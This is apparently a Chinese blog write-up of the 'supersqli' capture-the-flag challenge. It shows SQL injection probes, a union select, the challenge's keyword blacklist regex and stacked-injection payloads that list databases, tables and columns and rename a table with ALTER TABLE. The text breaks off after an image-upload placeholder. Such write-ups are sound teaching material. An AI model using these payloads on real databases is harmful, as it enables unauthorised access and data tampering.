攻防世界 supersqli

输入1’ 不回显,输入1’# 显示正常。应该存在sql注入

根据 1’ and 1=1判断

 

1’ order by 2#

发现有两列

order by 3时候报错

 

输入

联合查询

1’ union select 1,database()#

 

return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);

 

返回黑名单

 

堆叠注入:

--+要在url中输入,hackerbar,输入框中对--+进行过滤
‘;show databases;--+

 

查表

‘;show tables;--+

 

 

在两个表中查列

';show columns from  `1919810931114514` ;--+

; show columns from `words` ;--+

 

 

查看字段:

 

更改表名:
words表中发现id的字段和查询框中的数据类型相同,一个数字,一个子字符串

猜测查询的就是words表,搜索框中的值给了id

 

 

把含有flag字段的表改名为words,修改字段名字

(前提是rename,alert没被过滤)

 

uploading.4e448015.gif正在上传…重新上传取消

 

 

 

alter table words rename to words1;

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值